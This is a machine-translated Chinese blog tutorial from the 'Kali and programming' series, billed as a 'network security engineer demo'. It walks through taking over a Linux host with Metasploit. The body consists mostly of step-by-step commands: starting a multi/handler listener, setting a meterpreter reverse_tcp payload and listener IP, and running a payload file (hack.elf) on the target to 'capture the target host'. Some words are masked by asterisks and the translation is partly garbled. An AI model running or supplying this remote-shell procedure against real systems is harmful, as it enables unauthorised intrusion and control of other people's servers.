当前位置:网站首页>Network security engineer Demo: original * * controls your server like this! (2)
Network security engineer Demo: original * * controls your server like this! (2)
2020-11-10 07:39:00 【osc_a8r2ub9u】
Before class statement :
1、 This sharing is only for learning exchange , Please abide by the laws and regulations consciously !
2、 Search for :Kali And programming , Learn more about the Internet *** dried food !
3、Kali And programming is updated on time every day , Please study and pay attention to !
Body part
One 、 Background introduction
Metasploit It's a vulnerability framework . Its full name is The Metasploit Framework, It's called MSF.Metasploit As the most popular tool in the world , Not just because it's convenient and powerful , What's more, its framework . It allows users to develop their own vulnerability scripts , To test .Metasploit(msf) How powerful it is ? How to use it *** Controlling the victim's mainframe ? Now let's learn !
Two 、 Resources and equipment
1. Install well Linux A virtual machine of
2. Xiaobai, who is ready to go .
3. Installed Kali Linux One virtual machine .
3、 ... and 、 Strategic arrangements
3.1 start-up Metasploit(msf)*** The test framework , As shown in the figure below .
command 1:msfconsole
step 1: Use the corresponding vulnerability to exploit the module , As shown in the figure below .
command 2:use exploit/multi/handler
step 2: Check the parameters corresponding to the vulnerability module , As shown in the figure below .
command 3:show options
step 3: Set the corresponding payload Convenient for follow-up ***, As shown in the figure below .
command :set payload linux/x86/meterpreter/reverse_tcp
step 4: Check the relevant parameters of the vulnerability module , As shown in the figure below .
command :show options
step 5: Set the corresponding parameters , As shown in the figure below .
command :set lhost 193.168.78.169
step 6: Check whether the configured parameters are successful , As shown in the figure below .
command :show options
3.2 function *** file , As shown in the figure below .
step 1: to *** The file gives execution permission , As shown in the figure below .
command :chmod +x hack.elf
step 2: perform *** file , As shown in the figure below .
command :./hack.elf
3.3 Run the exploit module , As shown in the figure below .
command :run
As shown in the figure below , Successfully captured the target host .
View the file system information of the target host , As shown in the figure below .
Small make up a word knock creation , It's hard work , Can you pay attention to me ? You can also search for :Kali And programming , Learn more ****** How about the technique ! Rejection of piracy , Please state the source of the reprint :Kali And programming
Point me to learn more Kali Linux*** Testing and networking *** Practical skills !
版权声明
本文为[osc_a8r2ub9u]所创,转载请带上原文链接,感谢
边栏推荐
- 从零开始学习 YoMo 系列教程:开篇
- Can't find other people's problem to solve
- Notes on Python cookbook 3rd (2.2): String start or end match
- 工厂方法模式
- 一幅图像能顶16x16字!——用于大规模图像缩放识别的变压器(对ICLR 2021年论文的简要回顾)
- [elixir! 0073] beam built-in memory database ETS
- JMeter的简单使用
- Function calculation advanced IP query tool development
- 分布式文档存储数据库之MongoDB索引管理
- So what should investors do with the current market? Now a new investment outlet is coming!
猜你喜欢
编码风格:Mvc模式下SSM环境,代码分层管理
SQL filter query duplicate columns
一幅图像能顶16x16字!——用于大规模图像缩放识别的变压器(对ICLR 2021年论文的简要回顾)
商品管统——采购需求合并到采购单
编码风格:Mvc模式下SSM环境,代码分层管理
Use call, apply and bind to solve the annoying this in JS, this in event binding and parameter passing
Python cookbook 3rd note (2.1): using multiple qualifiers to split strings
Must see! RDS database all in one
Explanation of Z-index attribute
mac终端Iterm2支持rz和sz的解决方案
随机推荐
使用call、apply和bind解决js中烦人的this,事件绑定时的this和传参问题
Usage of [:] and [::] in Python
Filezilla server配置FTP服务器中的各种问题与解决方法
Overview of the most complete anomaly detection algorithm in history
完美日记母公司逸仙电商招股书:重营销、轻研发,前三季度亏11亿
Factory approach model
Day85: Luffy: shopping cart switching price according to different validity period & shopping cart deletion operation & price settlement & foreplay of order page
CUDA_存储器模型
Fire knowledge online answer activity small program
飞鸽传书局域网找不到其他人的问题解决
Yixian e-commerce prospectus of perfect diary parent company: focusing on marketing and ignoring R & D, with a loss of 1.1 billion in the first three quarters
Function calculation advanced IP query tool development
从零开始学习 YoMo 系列教程:开篇
Bifrost 位点管理 之 异构中间件实现难点(1)
What is the SRM system? SRM supplier management system functions
利用尾巴作为时间序列进行处理来识别鲸鱼
Mongodb index management of distributed document storage database
The length of the last word in leetcode
CUDA_ Get the specified device
C/C++编程笔记:C语言开发坦克大战!纪念我们逝去的小霸王游戏